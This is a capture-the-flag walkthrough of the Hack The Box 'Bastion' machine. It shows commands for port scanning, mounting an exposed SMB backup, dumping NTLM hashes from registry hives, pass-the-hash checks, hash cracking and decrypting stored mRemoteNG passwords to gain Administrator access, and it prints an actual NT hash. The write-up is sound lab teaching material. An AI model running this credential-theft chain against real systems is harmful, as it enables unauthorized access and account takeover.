Bastion
December 30, 2025

Created by: L4mpje
Page: Hack The Box
Difficulty: Easy
OS: Windows

Enumeration

The first step is a full TCP port scan, followed by version and default-script detection on the ports that came back open (/opt/extractports is a local helper that pulls the open port list out of the grepable nmap output):

    nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.134 -oG scan
    /opt/extractports scan
    nmap -p22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 -Pn -sCV 10.10.10.134 -oN ports

Among the open ports were SSH (22), SMB (139/445) and WinRM (5985).

SMB

SMB was exposed, so I enumerated the available shares with a guest session:

    smbmap -H 10.10.10.134 -u 'guest'

This revealed a share named Backups with read and write permissions. A note in the share warns that downloading all of its files can make the VPN unstable, so instead of copying the backup down I mounted the share locally (empty username and password; in the second form mount infers cifs from the // prefix):

    mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
    # alternatively
    mount //10.10.10.134/Backups smbShares/

Because the share is writable, adding -o ro to the mount is a sensible precaution so nothing on the target is modified by accident.

Inside the share, under WindowsImageBackup, I found two .vhd disk images. The first contained only boot files, so I focused on mounting the second one.

Offline Credential Extraction

To mount the VHD I attached it as a network block device with qemu-nbd, read-only so the image itself is never written to. After loading the module, ls /dev should list /dev/nbd0 and its siblings; once the image is attached, its first partition shows up as /dev/nbd0p1:

    modprobe nbd
    ls /dev
    qemu-nbd --read-only -c /dev/nbd0 \
      'smbShares/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd'
    mkdir /mnt/HDD
    mount /dev/nbd0p1 /mnt/HDD

The mounted filesystem belonged to a Windows installation. Local account hashes live in the SAM hive and are encrypted with a key (the boot key) stored in SYSTEM, while SECURITY holds the LSA secrets, so I copied all three registry hives out:

    cd /mnt/HDD/Windows/System32/config
    cp SAM SYSTEM SECURITY /tmp

Using Impacket, I dumped the local account hashes from the copied hives (run from /tmp; the LOCAL keyword tells secretsdump to work offline from the files rather than against a remote host):

    impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

This yielded the NTLM hash for the user L4mpje. The backup dates from February 2019, so the hash may no longer match the live system, which is why the next step checks it against the host before any time is spent cracking it.
I verified that the hash was still valid against the live host by passing it with netexec (the first half is the empty LM hash, the second half the NT hash):

    netexec smb 10.10.10.134 -u L4mpje -H "aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9"

I then cracked the NT hash with hashcat (mode 1000 is NTLM):

    hashcat -m 1000 26112010952d963c8dc4217daec986d9 /usr/share/wordlists/rockyou.txt

With the recovered password and SSH open on port 22, I authenticated to the system:

    ssh L4mpje@10.10.10.134

This allowed me to retrieve the user flag.

Privilege Escalation

While enumerating installed applications, I discovered mRemoteNG, a remote connections manager that saves the credentials of its configured connections. Its configuration directory is

    C:\Users\L4mpje\AppData\Roaming\mRemoteNG

and inside it I found confCons.xml, the file that holds the connection entries together with their encrypted passwords. Checking the changelog confirmed version 1.76.11. That version encrypts the stored passwords with AES-GCM under a key derived from a master password which, unless the user has set one, is the hardcoded default "mR3m", so anyone who can read the file can decrypt them. I used a public decryption script to recover the stored credentials:

    python3 mremoteng_decrypt.py confCons.xml

This revealed the Administrator password in clear text. Using these credentials, I connected via SSH:

    ssh Administrator@10.10.10.134

As Administrator, I was able to retrieve the root flag.